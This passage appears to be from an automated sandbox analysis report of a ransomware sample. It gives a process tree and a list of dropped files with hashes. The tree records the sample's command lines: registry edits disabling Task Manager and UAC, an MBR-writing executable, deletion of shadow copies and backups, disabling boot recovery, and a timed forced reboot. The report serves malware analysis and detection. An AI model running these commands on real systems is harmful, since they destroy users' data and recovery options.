                                                                                              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\4A9C.tmp\fakeerror.vbs"
                                                                                              3⤵
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              PID:1020
                                                                                            • C:\Windows\SysWOW64\PING.EXE
                                                                                              ping localhost -n 2
                                                                                              3⤵
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                                                              • Runs ping.exe
                                                                                              PID:1160
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                                                                              3⤵
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              • Modifies registry key
                                                                                              PID:5172
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
                                                                                              3⤵
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              • Modifies registry key
                                                                                              PID:5204
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
                                                                                              3⤵
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              • Modifies registry key
                                                                                              PID:5220
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
                                                                                              3⤵
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              • Modifies registry key
                                                                                              PID:5236
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
                                                                                              3⤵
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              • Modifies registry key
                                                                                              PID:5312
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
                                                                                              3⤵
                                                                                              • UAC bypass
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              • Modifies registry key
                                                                                              PID:5332
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                                              3⤵
                                                                                              • UAC bypass
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              • Modifies registry key
                                                                                              PID:5348
                                                                                            • C:\Users\Admin\AppData\Local\Temp\4A9C.tmp\mbr.exe
                                                                                              mbr.exe
                                                                                              3⤵
                                                                                              • Executes dropped EXE
                                                                                              • Writes to the Master Boot Record (MBR)
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              PID:5384
                                                                                            • C:\Users\Admin\AppData\Local\Temp\4A9C.tmp\Cov29Cry.exe
                                                                                              Cov29Cry.exe
                                                                                              3⤵
                                                                                              • Checks computer location settings
                                                                                              • Executes dropped EXE
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:5496
                                                                                              • C:\Users\Admin\AppData\Roaming\svchost.exe
                                                                                                "C:\Users\Admin\AppData\Roaming\svchost.exe"
                                                                                                4⤵
                                                                                                • Checks computer location settings
                                                                                                • Drops startup file
                                                                                                • Executes dropped EXE
                                                                                                • Drops desktop.ini file(s)
                                                                                                • Sets desktop wallpaper using registry
                                                                                                • Modifies registry class
                                                                                                • Suspicious behavior: AddClipboardFormatListener
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:5900
                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete
                                                                                                  5⤵
                                                                                                    PID:5236
                                                                                                    • C:\Windows\system32\vssadmin.exe
                                                                                                      vssadmin delete shadows /all /quiet
                                                                                                      6⤵
                                                                                                      • Interacts with shadow copies
                                                                                                      PID:5408
                                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                      wmic shadowcopy delete
                                                                                                      6⤵
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:5512
                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                    "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
                                                                                                    5⤵
                                                                                                      PID:4560
                                                                                                      • C:\Windows\system32\bcdedit.exe
                                                                                                        bcdedit /set {default} bootstatuspolicy ignoreallfailures
                                                                                                        6⤵
                                                                                                        • Modifies boot configuration data using bcdedit
                                                                                                        PID:5248
                                                                                                      • C:\Windows\system32\bcdedit.exe
                                                                                                        bcdedit /set {default} recoveryenabled no
                                                                                                        6⤵
                                                                                                        • Modifies boot configuration data using bcdedit
                                                                                                        PID:5288
                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                      "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
                                                                                                      5⤵
                                                                                                        PID:5320
                                                                                                        • C:\Windows\system32\wbadmin.exe
                                                                                                          wbadmin delete catalog -quiet
                                                                                                          6⤵
                                                                                                          • Deletes backup catalog
                                                                                                          PID:5456
                                                                                                      • C:\Windows\system32\NOTEPAD.EXE
                                                                                                        "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\covid29-is-here.txt
                                                                                                        5⤵
                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                        PID:5984
                                                                                                  • C:\Windows\SysWOW64\shutdown.exe
                                                                                                    shutdown /r /t 300 /c "5 minutes to pay until you lose your data and system forever"
                                                                                                    3⤵
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:5512
                                                                                                  • C:\Windows\SysWOW64\PING.EXE
                                                                                                    ping localhost -n 9
                                                                                                    3⤵
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                    • Runs ping.exe
                                                                                                    PID:5568
                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                    taskkill /f /im explorer.exe
                                                                                                    3⤵
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    • Kills process with taskkill
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:5072
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\4A9C.tmp\Cov29LockScreen.exe
                                                                                                    Cov29LockScreen.exe
                                                                                                    3⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                    PID:5464
                                                                                              • C:\Windows\system32\vssvc.exe
                                                                                                C:\Windows\system32\vssvc.exe
                                                                                                1⤵
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:4564
                                                                                              • C:\Windows\system32\wbengine.exe
                                                                                                "C:\Windows\system32\wbengine.exe"
                                                                                                1⤵
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:2980
                                                                                              • C:\Windows\System32\vdsldr.exe
                                                                                                C:\Windows\System32\vdsldr.exe -Embedding
                                                                                                1⤵
                                                                                                  PID:3556
                                                                                                • C:\Windows\System32\vds.exe
                                                                                                  C:\Windows\System32\vds.exe
                                                                                                  1⤵
                                                                                                  • Checks SCSI registry key(s)
                                                                                                  PID:5564
                                                                                                • C:\Windows\system32\LogonUI.exe
                                                                                                  "LogonUI.exe" /flags:0x4 /state0:0xa390d855 /state1:0x41c64e6d
                                                                                                  1⤵
                                                                                                  • Modifies data under HKEY_USERS
                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                  PID:5372

                                                                                                Network

                                                                                                MITRE ATT&CK Enterprise v15

                                                                                                Downloads

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                                                                  Filesize: 152B
                                                                                                  MD5: ba6ef346187b40694d493da98d5da979
                                                                                                  SHA1: 643c15bec043f8673943885199bb06cd1652ee37
                                                                                                  SHA256: d86eec91f295dfda8ed1c5fa99de426f2fe359282c7ebf67e3a40be739475d73
                                                                                                  SHA512: 2e6cc97330be8868d4b9c53be7e12c558f6eb1ac2c4080a611ba6c43561d0c5bb4791b8a11a8c2371599f0ba73ed1d9a7a2ea6dee2ae6a080f1912e0cb1f656c

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                                                                  Filesize: 152B
                                                                                                  MD5: b8880802fc2bb880a7a869faa01315b0
                                                                                                  SHA1: 51d1a3fa2c272f094515675d82150bfce08ee8d3
                                                                                                  SHA256: 467b8cd4aacac66557712f9843023dcedefcc26efc746f3e44157bc8dac73812
                                                                                                  SHA512:

                                                                                                  e1c6dba2579357ba70de58968b167d2c529534d24bff70568144270c48ac18a48ee2af2d58d78ae741e5a36958fa78a57955bd2456f1df00b781fc1002e123d2

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000b

                                                                                                  Filesize

                                                                                                  99KB

                                                                                                  MD5

                                                                                                  53fe43bd52d01c4526dac06426e2b666

                                                                                                  SHA1

                                                                                                  e9bf922a50f3832649d83f1da5c709a720d0ede9

                                                                                                  SHA256

                                                                                                  c67c5c0750d7974cacc5c70cd74f78497c7f791182d6a2809f4ec8da2d7510c1

                                                                                                  SHA512

                                                                                                  5fa4fe6bded6a6ba57b51ea88f7d54cc875dcd58c59bde9f0af9048260406d187ca86568ddb31d4d29e75c3256b79444ca67c52613659293e73e2c2094ebffde

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000f

                                                                                                  Filesize

                                                                                                  314KB

                                                                                                  MD5

                                                                                                  26cfc528bbf3f9545a35f07fd4cc4c83

                                                                                                  SHA1

                                                                                                  68c18ab5b58b839bca80835b6fece6081e5ecd04

                                                                                                  SHA256

                                                                                                  813b795e6bab991add6fcc2f9b4e8f938681ab29f21b280f1348b3d1198e8147

                                                                                                  SHA512

                                                                                                  226ab5af99230fef492ecbbd33c1c4ef9ffdcd8e9c48997455942196c1bf653404313890b7240b781e57e6e456ddb9b921a7031abb85b653b534d3340d4f6a4c

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000045

                                                                                                  Filesize

                                                                                                  1.7MB

                                                                                                  MD5

                                                                                                  272d3e458250acd2ea839eb24b427ce5

                                                                                                  SHA1

                                                                                                  fae7194da5c969f2d8220ed9250aa1de7bf56609

                                                                                                  SHA256

                                                                                                  bbb5c6b4f85c81a323d11d34629776e99ca40e983c5ce0d0a3d540addb1c2fe3

                                                                                                  SHA512

                                                                                                  d05bb280775515b6eedf717f88d63ed11edbaae01321ec593ecc0725b348e9a0caacf7ebcd2c25a6e0dc79b2cdae127df5aa380b48480332a6f5cd2b32d4e55c

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                  Filesize

                                                                                                  4KB

                                                                                                  MD5

                                                                                                  7a55f645ed3eab614905faedc1166557

                                                                                                  SHA1

                                                                                                  fe7dc28c02e6a1486ad4983ad1e2a89f318ac429

                                                                                                  SHA256

                                                                                                  77f1e0d590aa1ac12d87fac75c747ad657ba94d8b4156203e9973df86a6c6612

                                                                                                  SHA512

                                                                                                  d551fdced0a8a468ee13cfc856d468078da15ca37f5e641e47b5f3df862762060ec9dbae505dc0b73e6756bd8b159863fa76d1590abfed9c838b91582c45dde5

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                  Filesize

                                                                                                  2KB

                                                                                                  MD5

                                                                                                  ac2b80034028d2f8ce838f1176e700d1

                                                                                                  SHA1

                                                                                                  f9e69804ff9375ac345a9ad3463ce8489323082a

                                                                                                  SHA256

                                                                                                  63fbd324596e5edbe5e36ff0b0f63c1db05465d2f04b5b8566c08d4c5ef4e59e

                                                                                                  SHA512

                                                                                                  d6722bdea0854a78c57192dc8715927edf3c94185acb6bb3e900774b17c16053d7f98e99ad2e0e3771f147cec8b687809c0fba64e9410bbcbf6d3b45a5650f67

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                  Filesize

                                                                                                  4KB

                                                                                                  MD5

                                                                                                  a7d079215ec676e6ecfbb15675914502

                                                                                                  SHA1

                                                                                                  44bf184b2652b2736aef4a9850e14334c57b69d1

                                                                                                  SHA256

                                                                                                  80e4bb4fc7e5d3f8526f5fd241b3efb151c6b3838b0cb16c930fe44670452fd3

                                                                                                  SHA512

                                                                                                  1d75b4922e7b72f0e4c2aec67b3ad1bf63614badbf380971e8e2d91d1b42ba1626974415e294412a070e5b4cb0ab8e7a15bbb76c0066c79b0f5be05cd0143936

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                  Filesize

                                                                                                  8KB

                                                                                                  MD5

                                                                                                  58c666c77c9dc0870914e8c6a670e98f

                                                                                                  SHA1

                                                                                                  d23f797066cb4e8458738dba7951c5830b863c9b

                                                                                                  SHA256

                                                                                                  fc8acaa0742075dd731b879fe74397c8c8aee395fb81b43ea583f1e02db35fd8

                                                                                                  SHA512

                                                                                                  9638a5f143a16c5c7d180eca10c9c9dabb61c84f859778c6e93e15c6e69d9e7241ecb7fb3031a99878a8bcca8f6b969c46f039dc699ddd7df4aa7e90776ea8c0

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                  Filesize

                                                                                                  8KB

                                                                                                  MD5

                                                                                                  3bf2c27f0c8828de7e06329b1eeb27d0

                                                                                                  SHA1

                                                                                                  27393290691bc08d2cd9a7c85a388288098509c8

                                                                                                  SHA256

                                                                                                  8308e7cb5e2578ed053692a6d5c9f0a7708d18d961acca0aea9a2b52e7ab311c

                                                                                                  SHA512

                                                                                                  8a3e821e1c245784aea30cea6f1720ca70accfbfe621c034b3b55d5d08050194e86b1b976e377c30baa8717b36c75ca22376be020488bb06610d5cba2fa531d8

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                  Filesize

                                                                                                  7KB

                                                                                                  MD5

                                                                                                  60968c9c1d80607d0e84a548ef5d2c8e

                                                                                                  SHA1

                                                                                                  a082a72a6c4cc983be52dbc3de0f1fab3506e98b

                                                                                                  SHA256

                                                                                                  d4e60b55f65f13024d1e7f08bf4454a9eb04829404863c013144fb8f010d6199

                                                                                                  SHA512

                                                                                                  03bdbad3d8cf128a15e1ef30805737da3c96656d9e4132efaac40340e56eea93b31fbf14453c0f5aa38819a13786a67e45ebd5c60af9ee12184ea1d1ab8df8b1

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                  Filesize

                                                                                                  8KB

                                                                                                  MD5

                                                                                                  b4da7ec7fb35e9d55f1151f96a9181ec

                                                                                                  SHA1

                                                                                                  7b7a48f29191892ba42e51fada048aaaa3bb7b84

                                                                                                  SHA256

                                                                                                  84a61bd39a22be416563267fc0ae743d9794eef29a0bad74b0d929a21f577ea9

                                                                                                  SHA512

                                                                                                  ff2006c056972202eb42ccf76e9c8133e60428789e604b859ab62fdcdbcc3ae9bd7a13d9606b9e9ecf2cb3c9845b92aa63c1d74aa94269f19caa370ee8b7c813

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                  Filesize

                                                                                                  5KB

                                                                                                  MD5

                                                                                                  aa544cbd5b7d730a265807f253fe2995

                                                                                                  SHA1

                                                                                                  c652e19ce41e6814784c480dacfc8af054e6826e

                                                                                                  SHA256

                                                                                                  d5e3cb2ed8c53a28908861940ad8a51e7aa5bd52055d54e416d041182c3a7df8

                                                                                                  SHA512

                                                                                                  5b7add7f2f452551446a92858f61d3679aaa3bb7706e98d66d68072577b91f90290f091457186cfa6f2ab04bd336b468d72edf84c51f260b0d70924cf2aaa467

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                  Filesize

                                                                                                  6KB

                                                                                                  MD5

                                                                                                  db4c255461afe45ede8ac8240adbf45a

                                                                                                  SHA1

                                                                                                  cb3e4274e5d51e8b26a50afaa95a2f490a5494bb

                                                                                                  SHA256

                                                                                                  fd92a28313bed6720343d79e08529e223a4f85977202ff43c8dcd1b31f93f0be

                                                                                                  SHA512

                                                                                                  79b0d9b1ed23460434330aae39ee25e673ded89f89b91175597daf31fa188209fbb43cf3f95baeb1154cc2cff9d2d516fa9d614bf2374016efbcc24b28928216

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

                                                                                                  Filesize

                                                                                                  72B

                                                                                                  MD5

                                                                                                  b64cd384949f416d42b005f0e95f057e

                                                                                                  SHA1

                                                                                                  b8bde812da1089cd274cb52797b2c75f578b2c8b

                                                                                                  SHA256

                                                                                                  e6c22dc35ce51b36916e5ba622e898a58726bc949348cc6642e7ce7fd3ec82a3

                                                                                                  SHA512

                                                                                                  4b66222909dfbf2899fc173502c5a26f8b02a62de58489b42fc7dee613061ad692909b42d79f789d70fa9f84d22eba01af0f5acc3becd80d9950bf932f30b9c6

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe590843.TMP

                                                                                                  Filesize

                                                                                                  48B

                                                                                                  MD5

                                                                                                  1008f59f5f56e1178b9ef954908125d2

                                                                                                  SHA1

                                                                                                  3322a5c285dcf6d5d18454a3bbd3cb1e21a9e2c1

                                                                                                  SHA256

                                                                                                  e6c329c53b0e11b1e24be8c0f9849ba2024e4a3d4a8cd4449b5492c72c6bff9f

                                                                                                  SHA512

                                                                                                  2ccad5f854528cf06c7d8e7e86d7df446d1abb34f26e17bd5b9bdf98dd85a21179ee88980887147391162adad54beba91dd5894eb73fb664b8586d436839c73d

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                  Filesize

                                                                                                  1KB

                                                                                                  MD5

                                                                                                  44688592b0b439246a13b27a3b7e361e

                                                                                                  SHA1

                                                                                                  32c86e8d46c3b99b4868808a1eff21c77aa197be

                                                                                                  SHA256

                                                                                                  8831ab527bf9f99d0a1f36f6df72644f59542727e379a6f46d42fbf204dc9789

                                                                                                  SHA512

                                                                                                  05d2014139be0777a23df58e16d2ca36e14c5df88c883ff801d67117814e96b08dc3cbc5bee2edcc8e3c7d1446f69051bdcc067aeef2cc7355989389d4deb7ed

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                  Filesize

                                                                                                  3KB

                                                                                                  MD5

                                                                                                  5306d9eccbe23d91f4e3da8503a4db57

                                                                                                  SHA1

                                                                                                  8fd790362e1c4d920e577d767376f33c3d83aeb4

                                                                                                  SHA256

                                                                                                  ae36dbd812c92aa33551e64c1252eeb8dd8674634121ed33c77bce47d3911602

                                                                                                  SHA512

                                                                                                  cd833d4692178b4ed8bfe1c71d8b44b9cd245d86204fab131539447e89315d6fdc0e57136d73f353828f88890b257e368cf3b0a0b78bc5ef2e6254735bc4f121

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                  Filesize

                                                                                                  3KB

                                                                                                  MD5

                                                                                                  be08a88a7a38d23fb9868809d73150d1

                                                                                                  SHA1

                                                                                                  92c580f65909ceb9e358360d81bd91df372efe9a

                                                                                                  SHA256

                                                                                                  e989ff3de5b6442be99177d082caf8b8262edf30b7175287732fd86510e73ba8

                                                                                                  SHA512

                                                                                                  00809271c3a55deead739f84e9e95b28f6ba600abd49b3a71f58d84a3b1073e20d05a987e2ddc44cdc3b679e8faf1804353a3286079b18f92241a0a2f8d6d54a

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                  Filesize

                                                                                                  3KB

                                                                                                  MD5

                                                                                                  60b5e67b05385ea36a0bfb35e7cbe71c

                                                                                                  SHA1

                                                                                                  345e5962319d53305c946544b450522c3c0a24c2

                                                                                                  SHA256

                                                                                                  6d4a352476f9669792b1f25a29580e90ce082e3e629ccc13acd0b362109ae56f

                                                                                                  SHA512

                                                                                                  62b82aa161be3ff81b3726acdd233b3fc6f4e6977b150fd508d01e00d17bcc927ca92dfdfbbb1c4feefcdb1864b5bcb2be06716f1cf73b66db21b2526aa26332

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                  Filesize

                                                                                                  1KB

                                                                                                  MD5

                                                                                                  128bf86a04ce3458a94ce27e68642bfe

                                                                                                  SHA1

                                                                                                  1359a364d9b66c0cef2c7229bf7bdc51327f7733

                                                                                                  SHA256

                                                                                                  2cdd088b26ca580489f9a8e373c096ed908b448849958054e2b1213274343f05

                                                                                                  SHA512

                                                                                                  f0b5587d3e838d69107ddcb5eefee71ccaca826803e5f00839a32c56e17e74745ce829e908c637ca1b46024a0f7f66528c07b5bbf6c308ffb2af9b48f6558ccc

  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe58722d.TMP (Filesize 1KB)

  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT (Filesize 16B)

  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State (Filesize 11KB)

  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State (Filesize 11KB)

  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State (Filesize 10KB)

  • C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb (Filesize 64KB)

  • C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb (Filesize 1024KB)

  • C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.DTD (Filesize 498B)

  • C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML (Filesize 9KB)

  • C:\Users\Admin\AppData\Local\Temp\4A9C.tmp\Cov29Cry.exe.death (Filesize 103KB)

  • C:\Users\Admin\AppData\Local\Temp\4A9C.tmp\Cov29LockScreen.exe (Filesize 48KB)

  • C:\Users\Admin\AppData\Local\Temp\4A9C.tmp\TrojanRansomCovid29.bat (Filesize 1KB)

  • C:\Users\Admin\AppData\Local\Temp\4A9C.tmp\fakeerror.vbs (Filesize 144B)

  • C:\Users\Admin\AppData\Local\Temp\4A9C.tmp\mbr.exe.danger (Filesize 1.3MB)

  • C:\Users\Admin\AppData\Local\Temp\wmsetup.log (Filesize 1KB)

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\74d7f43c1561fc1e.customDestinations-ms (Filesize 3KB)

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\74d7f43c1561fc1e.customDestinations-ms (Filesize 1KB)

  • C:\Users\Admin\Desktop\covid29-is-here.txt (Filesize 861B)